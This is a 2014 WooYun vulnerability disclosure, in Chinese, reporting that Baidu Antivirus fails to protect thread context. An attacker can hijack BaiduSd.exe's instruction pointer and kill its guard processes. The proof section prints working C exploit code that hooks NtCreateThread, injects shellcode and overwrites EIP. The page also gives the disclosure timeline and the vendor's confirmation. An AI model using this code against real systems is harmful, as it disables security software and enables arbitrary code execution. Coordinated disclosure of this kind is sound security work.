当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-082154

漏洞标题:百度杀毒冰山全防御失效漏洞

相关厂商:百度

漏洞作者: alvin

提交时间:2014-11-06 18:51

修复时间:2015-02-04 18:52

公开时间:2015-02-04 18:52

漏洞类型:权限提升

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-06: 细节已通知厂商并且等待厂商处理中
2014-11-07: 厂商已经确认,细节仅向厂商公开
2014-11-10: 细节向第三方安全合作伙伴开放
2015-01-01: 细节向核心白帽子及相关领域专家公开
2015-01-11: 细节向普通白帽子公开
2015-01-21: 细节向实习白帽子公开
2015-02-04: 细节向公众公开

简要描述:

缺少对线程CONTEXT的防御,导致BaiduSd.exe的eip被控制,执行任意代码

详细说明:

攻击触发之前:

before.jpg


攻击触发之后:

after.jpg


百度杀毒守护进程全都被杀掉

漏洞证明:

LONG WINAPI FakeNtCreateThread(PVOID p1, PVOID p2, PVOID p3, PVOID p4, PVOID p5, PVOID p6, PVOID p7,PVOID p8)
{
PBYTE pBase = (PBYTE)VirtualAllocEx(p4, NULL, 0x400, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(pBase)
{
BYTE code[] =
{
0x90, 0x90, 0x90, 0x8b, 0xec, 0x81, 0xec, 0x00,
0x01, 0x00, 0x00, 0x68, 0x0c, 0x0c, 0x0c, 0x0c,
0x6a, 0x00, 0x6a, 0x01, 0xb9, 0xd1, 0x09, 0x83,
0x7c, 0xff, 0xd1, 0x6a, 0x02, 0x50, 0xb9, 0x1a,
0x1e, 0x80, 0x7c, 0xff, 0xd1, 0x68, 0x0c, 0x0c,
0x0c, 0x0c, 0x6a, 0x00, 0x6a, 0x01, 0xb9, 0xd1,
0x09, 0x83, 0x7c, 0xff, 0xd1, 0x6a, 0x02, 0x50,
0xb9, 0x1a, 0x1e, 0x80, 0x7c, 0xff, 0xd1, 0x6a,
0x00, 0x6a, 0xff, 0xb9, 0x1a, 0x1e, 0x80, 0x7c,
0xff, 0xd1, 0x00,
};
BOOL bWrite = FALSE;
DWORD dwWritten = 0;
bWrite = WriteProcessMemory(p4, (LPVOID)pBase, code, sizeof(code), &dwWritten);
*((DWORD*)((PBYTE)p6 + 0xb0)) = (DWORD)pBase;
}
return (fnNtCreateThread)(p1, p2, p3, p4, p5, p6,p7,p8);
}
void main()
{
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { 0 };
si.cb = sizeof(STARTUPINFO);
DWORD old = (DWORD)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtCreateThread");
DetourProc((PVOID)old, (PVOID)FakeNtCreateThread, (PVOID*)(&fnNtCreateThread));
CreateProcess("C:\\Program Files\\Baidu\\BaiduSd\\3.0.0.4605\\BaiduSd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}

修复方案:

增加对线程CONTEXT的防御

版权声明:转载请注明来源 alvin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-11-07 11:22

厂商回复:

感谢提交,我们已经通知业务部门处理此问题。

最新状态:

暂无